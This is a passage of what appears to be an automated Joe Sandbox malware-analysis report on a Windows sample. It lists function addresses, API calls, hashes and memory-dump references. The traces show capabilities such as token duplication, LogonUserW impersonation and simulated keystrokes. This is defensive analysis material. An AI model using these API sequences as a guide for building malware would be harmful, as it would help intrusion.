Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction ID: 6c5e10eb16971aa7c5077b82ff950d0662c1c295916054eef83bed6e1020f663
Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction Fuzzy Hash: 57F02D32510A1597D7313A65AC0FB9B3FE8BFD2339F100719F424931D1CB70D80186A5

Function 00544C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00511129,00000000,?,00542E29,00000001,00000364,?,?,?,0053F2DE,00543863,005E1444,?,0052FDF5,?), ref: 00544CBE

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b9e1522ed38326f20b62199e8f248f0d4790d6e57c2baea3e7d318970a886a16
Instruction ID: 4659401197991350d627ea968523f16c841bb239aadb1ac43c86834c658446de
Opcode Fuzzy Hash: b9e1522ed38326f20b62199e8f248f0d4790d6e57c2baea3e7d318970a886a16
Instruction Fuzzy Hash: 52F0E93168222567DB215F72AC8DBDB3F98BF917A9F1C4121BC15AA281CA30DC009EE0

Function 00543820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,005E1444,?,0052FDF5,?,?,0051A976,00000010,005E1440,005113FC,?,005113C6,?,00511129), ref: 00543852

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1fc77640f5bb0d2085960ab3dbfc0d280e7bce6a13504e8330d23459534c25dc
Instruction ID: 2f5f05b9be6bcdeb8d9d0c5cea27efbf4dca003c3cd192af6aa530af4a067f40
Opcode Fuzzy Hash: 1fc77640f5bb0d2085960ab3dbfc0d280e7bce6a13504e8330d23459534c25dc
Instruction Fuzzy Hash: F9E02B3110322596D7312A779C04BDBBF49BF927B8F050030BC14965B0DB21ED019AE1

Function 00514F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514F6D

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 5241ec33e3ed82c3b07d9b72859507fc65ff1a261b66233116e9e32668ce8d68
Instruction ID: 2c9151721821c03295ce8f418c1f18d359c46c982612447c3d2c6a9ce3916412
Opcode Fuzzy Hash: 5241ec33e3ed82c3b07d9b72859507fc65ff1a261b66233116e9e32668ce8d68
Instruction Fuzzy Hash: B4F01571105792CFEB349F64E4948A2BFE4BF15329324997EE1EA86721C7319889DF10

Function 00512DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00512DC4

Part of subcall function 00516B57: _wcslen.LIBCMT ref: 00516B6A

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 1caff749c3c295e75cceea02674f4a6ab957183f92078c586c7744f08f545cca
Instruction ID: af6bb60d88b20b4a14c9e3f61be18ee2463dd605261ee7774c41c0eb110563f5
Opcode Fuzzy Hash: 1caff749c3c295e75cceea02674f4a6ab957183f92078c586c7744f08f545cca
Instruction Fuzzy Hash: B9E0CD766041245BC71092589C09FEA7BDDEFC8790F050071FD09D7248DA60AD848550

Function 00582693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 005826B5

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction ID: 4af60ae06e8a28e03a92370fb77e0dabebe6cbf16edd06e3fed704e15c7571f9
Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction Fuzzy Hash: D8E048B06097005FDF396A28A8517B6BBD4AF49300F10045EF59F92252E5726845874D

Function 00512B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00513837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00513908

Part of subcall function 0051D730: GetInputState.USER32 ref: 0051D807

SetCurrentDirectoryW.KERNEL32(?), ref: 00512B6B

Part of subcall function 005130F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0051314E

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: de095e054a15b48a2d6c0faef4dbe459d926b0fff45b7e8c14b353759a33b607
Instruction ID: 9e774b8ef3a567c51a5a47a9b086c4ec7cdf331ecb298829a5f51daef80eac61
Opcode Fuzzy Hash: de095e054a15b48a2d6c0faef4dbe459d926b0fff45b7e8c14b353759a33b607
Instruction Fuzzy Hash: D3E0863130424617EB08BB75A86A5EDBF99BBE5351F40153EF182472A2CF658AC98352

Function 0055039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00550704,?,?,00000000,?,00550704,00000000,0000000C), ref: 005503B7

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 54f1aac22010cd729c72b798458b2d50dd5650f05d8a71586cfef900dec2cc58
Instruction ID: e3fdca1bd9b971a046894b3aa3ac286079517264a556a7e70bb7ea0c106ed27b
Opcode Fuzzy Hash: 54f1aac22010cd729c72b798458b2d50dd5650f05d8a71586cfef900dec2cc58
Instruction Fuzzy Hash: 8AD06C3214010DBBDF028F84DD06EDA3FAAFB48714F014000BE1856020C736E821EB90

Function 00511CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00511CBC

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 47ad4b8e05770eede9ba130daf9b36dba2778459329f13e8e9734d64e9f979a1
Instruction ID: c4d423dec8d936809a059062ce4fa6cb68b61af6229407aa99593c5eb325b763
Opcode Fuzzy Hash: 47ad4b8e05770eede9ba130daf9b36dba2778459329f13e8e9734d64e9f979a1
Instruction Fuzzy Hash: 96C09B352803449FF3184780BD8AF107754A36CB01F444401F6895D5E3C7B11814FA54

Function 0056D8DD Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 0056D8E9

Part of subcall function 005133A7: _wcslen.LIBCMT ref: 005133AB

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: PathTemp_wcslen
String ID:
API String ID: 1974555822-0
Opcode ID: d9958b39f951ab8db3dfdeefc5d7f1c4577f68be0aa2864997b11fb91fec9c53
Instruction ID: 66fee0c7baf0924bc74beba94427e70da96b5567ad45a1c29652cb38491f6487
Opcode Fuzzy Hash: d9958b39f951ab8db3dfdeefc5d7f1c4577f68be0aa2864997b11fb91fec9c53
Instruction Fuzzy Hash: C7C04C7850101A9BDB909790CDD9AA87B34FF10301F5044D5E246950509E705A889B11

Function 0058744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 00515745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0051949C,?,00008000), ref: 00515773

GetLastError.KERNEL32(00000002,00000000), ref: 005876DE

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: 7012087aa1cd6d163b50e1aebf1e9603479ad0bec23d2ee13068b99ac113dcc5
Instruction ID: 922f3f50dde9756997be3aa71108d311fc7b45cd038a059e6266162e78a8269f
Opcode Fuzzy Hash: 7012087aa1cd6d163b50e1aebf1e9603479ad0bec23d2ee13068b99ac113dcc5
Instruction Fuzzy Hash: E181A3302087069FDB15EF28C495AA9BBE1BF89310F14491DFC966B392DB30ED85CB52

Function 01602D1C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 01602D31

Memory Dump Source

Source File: 00000000.00000002.2087758926.0000000001600000.00000040.00000020.00020000.00000000.sdmp, Offset: 01600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1600000_4sfN3Gx1vO.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: 6d607d613c0447acde0502c5f42d63e3332556d973c6f8a88646b2253753de3d
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 57E0BF7594110DEFDB00EFA4D94D6DE7BB4EF04301F1005A5FD05D7691DB309E548A62

Function 01602D20 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 01602D31

Memory Dump Source

Source File: 00000000.00000002.2087758926.0000000001600000.00000040.00000020.00020000.00000000.sdmp, Offset: 01600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1600000_4sfN3Gx1vO.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 10928a9aa6a773d6620274100929e26233caace0f45b724e6033734b9d02d0e8
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 89E0E67594110DDFDB00EFB4D94D69E7FB4EF04301F100165FD01D2281D6309D508A62

Non-executed Functions

Function 005A9576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00529BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00529BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 005A961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 005A965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 005A969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 005A96C9
SendMessageW.USER32 ref: 005A96F2
GetKeyState.USER32(00000011), ref: 005A978B
GetKeyState.USER32(00000009), ref: 005A9798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 005A97AE
GetKeyState.USER32(00000010), ref: 005A97B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 005A97E9
SendMessageW.USER32 ref: 005A9810
SendMessageW.USER32(?,00001030,?,005A7E95), ref: 005A9918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 005A992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 005A9941
SetCapture.USER32(?), ref: 005A994A
ClientToScreen.USER32(?,?), ref: 005A99AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 005A99BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 005A99D6
ReleaseCapture.USER32 ref: 005A99E1
GetCursorPos.USER32(?), ref: 005A9A19
ScreenToClient.USER32(?,?), ref: 005A9A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 005A9A80
SendMessageW.USER32 ref: 005A9AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 005A9AEB
SendMessageW.USER32 ref: 005A9B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 005A9B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 005A9B4A
GetCursorPos.USER32(?), ref: 005A9B68
ScreenToClient.USER32(?,?), ref: 005A9B75
GetParent.USER32(?), ref: 005A9B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 005A9BFA
SendMessageW.USER32 ref: 005A9C2B
ClientToScreen.USER32(?,?), ref: 005A9C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 005A9CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 005A9CDE
SendMessageW.USER32 ref: 005A9D01
ClientToScreen.USER32(?,?), ref: 005A9D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 005A9D82

Part of subcall function 00529944: GetWindowLongW.USER32(?,000000EB), ref: 00529952

GetWindowLongW.USER32(?,000000F0), ref: 005A9E05

Strings

p#^, xrefs: 005A9990
@GUI_DRAGID, xrefs: 005A997D
F, xrefs: 005A9D07

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F$p#^
API String ID: 3429851547-1742403966
Opcode ID: 508a200880fb2dcc4a96c1f3b3d0f8ba6faf4fc5b40d4db587102515b123718b
Instruction ID: 8b808e43fcf4666124bd06d5fd4d09a42a9fe7d8a9a0dbda268f7e4305b14c51
Opcode Fuzzy Hash: 508a200880fb2dcc4a96c1f3b3d0f8ba6faf4fc5b40d4db587102515b123718b
Instruction Fuzzy Hash: 8E427E34604251AFDB25CF28CC84AAEBFE5FF9A310F140A19F6998B2A1D731E854DF51

Function 005A4873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 005A48F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 005A4908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 005A4927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 005A494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 005A495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 005A497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 005A49AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 005A49D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 005A4A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 005A4A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 005A4A7E
IsMenu.USER32(?), ref: 005A4A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 005A4AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 005A4B20
GetWindowLongW.USER32(?,000000F0), ref: 005A4B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 005A4BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 005A4C82
wsprintfW.USER32 ref: 005A4CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 005A4CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 005A4CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 005A4D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 005A4D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 005A4D5A

Strings

%d/%02d/%02d, xrefs: 005A4CA8

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: 0c04b1048c40f5069846f9c1fc17b47e059fff40233b5c6134db9a5d24a40eae
Instruction ID: ff3a53fc80c8389ccc4f5d2e9e7ab0a3bb3ed87342e9b58df4dc6d93e7d984d5
Opcode Fuzzy Hash: 0c04b1048c40f5069846f9c1fc17b47e059fff40233b5c6134db9a5d24a40eae
Instruction Fuzzy Hash: 9312CC71600255ABEB258FA8DC49BAE7FF8BF86310F104529F516EB2E1DBB49940CF50

Function 0052F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0052F998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0056F474
IsIconic.USER32(00000000), ref: 0056F47D
ShowWindow.USER32(00000000,00000009), ref: 0056F48A
SetForegroundWindow.USER32(00000000), ref: 0056F494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0056F4AA
GetCurrentThreadId.KERNEL32 ref: 0056F4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0056F4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 0056F4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0056F4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0056F4DE
SetForegroundWindow.USER32(00000000), ref: 0056F4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 0056F4F6
keybd_event.USER32(00000012,00000000), ref: 0056F501
MapVirtualKeyW.USER32(00000012,00000000), ref: 0056F50B
keybd_event.USER32(00000012,00000000), ref: 0056F510
MapVirtualKeyW.USER32(00000012,00000000), ref: 0056F519
keybd_event.USER32(00000012,00000000), ref: 0056F51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 0056F528
keybd_event.USER32(00000012,00000000), ref: 0056F52D
SetForegroundWindow.USER32(00000000), ref: 0056F530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 0056F557

Strings

Shell_TrayWnd, xrefs: 0056F46F

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 99dcc326617ac6edcfe96143e748ccaf05a2417d214f9cd84eeb4c75766db03b
Instruction ID: 278717d20a80338e72325e7e96d7edf358076d615b21dfaf1c2bde6e3d2b49e1
Opcode Fuzzy Hash: 99dcc326617ac6edcfe96143e748ccaf05a2417d214f9cd84eeb4c75766db03b
Instruction Fuzzy Hash: 30311D71E40218BBEB216BB55C4AFBF7E6CEB59B50F100466FA01E71D1CAB15D00ABA0

Function 00571201 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 005716C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0057170D
Part of subcall function 005716C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0057173A
Part of subcall function 005716C3: GetLastError.KERNEL32 ref: 0057174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00571286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 005712A8
CloseHandle.KERNEL32(?), ref: 005712B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 005712D1
GetProcessWindowStation.USER32 ref: 005712EA
SetProcessWindowStation.USER32(00000000), ref: 005712F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00571310

Part of subcall function 005710BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,005711FC), ref: 005710D4
Part of subcall function 005710BF: CloseHandle.KERNEL32(?,?,005711FC), ref: 005710E9

Strings

default, xrefs: 0057130B
Z], xrefs: 00571392
winsta0, xrefs: 005712CC
, xrefs: 0057125A

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
